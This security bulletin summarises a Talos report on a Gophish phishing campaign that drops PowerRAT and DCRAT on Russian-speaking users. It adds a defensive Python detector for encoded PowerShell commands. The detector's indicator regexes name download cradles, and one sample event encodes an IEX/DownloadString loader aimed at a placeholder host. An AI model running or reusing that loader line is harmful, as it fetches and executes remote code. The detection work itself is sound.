Threat Actor Abuses Gophish to Deliver New PowerRAT and DcRAT
Summary:
Cisco Talos recently uncovered a phishing campaign, run by an as yet unidentified threat actor, that relies on the open-source Gophish toolkit. The campaign uses modular infection chains, delivered either through malicious Word documents (maldocs) or through HTML files carrying JavaScript, that end in one of two remote access trojans (RATs): PowerRAT, a newly identified PowerShell-based RAT, and DCRAT, a well-known commodity RAT. The actor appears to be actively developing PowerRAT, as shown by placeholders for base64-encoded PowerShell scripts left inside the malware.
The campaign specifically targets Russian-speaking users: the phishing emails and lure documents are written in Russian, and one lure is a spoofed webpage mimicking VKontakte (VK), a social media platform popular in Russia and neighbouring countries. Talos traced the phishing emails to domains such as disk-yanbex[.]ru, hosted on AWS infrastructure. The same server hosted the Gophish instance, served the malicious documents and HTML files, and sent the phishing emails, which contained links to the files that start the infection.
The attack follows two main vectors. In the maldoc chain, the user is tricked into enabling macros in a Word document; the macro then runs scripts that drop PowerRAT on the victim's machine. PowerRAT stays hidden on the host, performs reconnaissance, and communicates with command-and-control (C2) servers located in Russia; it can execute additional PowerShell commands received from the C2, opening the door to follow-on payloads. In the HTML chain, the embedded JavaScript downloads and installs DCRAT, a RAT that provides remote control, data theft and keylogging, and that maintains persistence by masquerading as legitimate Windows processes.
Security Officer Comments:
The infrastructure supporting the campaign includes C2 servers in Russia, which PowerRAT contacts for further instructions, while DCRAT retrieves additional payloads from hardcoded GitHub repositories. Although the campaign is aimed at Russian-speaking users, it shows how phishing campaigns are evolving toward modular, multi-vector designs, in which the same Gophish delivery infrastructure can feed more than one payload.
Suggested Corrections:
This campaign underlines the value of email filtering, of blocking Office macros by default (in particular for documents that arrive from the internet), and of monitoring PowerShell activity, for example by enabling script block logging and alerting on encoded or download-and-execute command lines. Multi-factor authentication and network segmentation limit what a compromised endpoint can reach, and are especially relevant to organizations with Russian-speaking employees or a presence in the region.
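One concrete form of the PowerShell monitoring suggested above, as an added example for this summary (it is not code from Talos or from the campaign): a small Python triage routine over process-creation command lines that decodes -EncodedCommand payloads and scores the visible and decoded text for download-and-execute tells. The sample command lines, the example.invalid URL and the indicator list are constructed for illustration and are not indicators from the report.

```python
"""Triage PowerShell command lines for the tells a PowerShell-based RAT loader relies on.

Added example for this summary; it is not code from Talos or from the campaign.
It scans process-creation style "CommandLine" values (Sysmon Event ID 1 /
Security Event ID 4688) for PowerShell launched with an encoded command,
decodes the UTF-16LE base64 payload, and scores the visible and decoded text
for download-and-execute indicators.
"""
import base64
import re

# -EncodedCommand and its short forms (-e, -ec, -enc) followed by a base64 blob.
ENC_RE = re.compile(r"(?i)(?<=\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")

# Indicator names -> patterns. These are common tells, not signatures for a specific sample.
INDICATORS = {
    "download_cradle": re.compile(
        r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer"),
    "invoke_expression": re.compile(r"(?i)invoke-expression|\biex\b"),
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "policy_bypass": re.compile(r"(?i)-e(?:xecutionpolicy|p)\s+bypass"),
    "nested_base64": re.compile(r"(?i)frombase64string"),
}


def encode_ps(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_ps(blob: str):
    """Reverse encode_ps; return None if the blob is not valid UTF-16LE base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(command_line: str) -> dict:
    """Return encoded flag, decoded script (or None), sorted indicator names and a verdict."""
    match = ENC_RE.search(command_line)
    decoded = decode_ps(match.group(1)) if match else None
    # Score the command line with the base64 blob removed, plus whatever it decoded to,
    # so the indicator regexes never fire on a coincidental substring of the blob itself.
    haystack = ENC_RE.sub(" ", command_line) + "\n" + (decoded or "")
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(haystack))
    if (match and hits) or len(hits) >= 2:
        verdict = "alert"
    elif hits or match:
        verdict = "review"  # a lone indicator, or an encoded command with nothing suspicious inside
    else:
        verdict = "benign"
    return {"encoded": bool(match), "decoded": decoded, "indicators": hits, "verdict": verdict}


def triage(command_lines):
    """Analyze a batch and return only the non-benign results, most severe first."""
    order = {"alert": 0, "review": 1}
    results = [dict(analyze(c), command_line=c) for c in command_lines]
    return sorted((r for r in results if r["verdict"] != "benign"), key=lambda r: order[r["verdict"]])


# Constructed sample command lines (not from the report). The first has the shape of a
# download-and-execute loader; example.invalid is a placeholder, not a real C2 host.
SAMPLE_EVENTS = [
    "powershell.exe -NoProfile -w hidden -enc "
    + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"),
    r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1",
    r'powershell.exe -NoProfile -Command "Get-ChildItem C:\Users\alice\Documents"',
]

if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(f"[{r['verdict']}] {', '.join(r['indicators']) or 'encoded only'}: {r['command_line'][:70]}")
        if r["decoded"]:
            print("    decoded:", r["decoded"])
```

In production the same routine would read command lines from the SIEM rather than from SAMPLE_EVENTS; the verdict tiers are deliberately coarse so that an encoded command with no recognised cradle still surfaces for review instead of being dropped.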
Link(s):
https://blog.talosintelligence.com/gophish-powerrat-dcrat/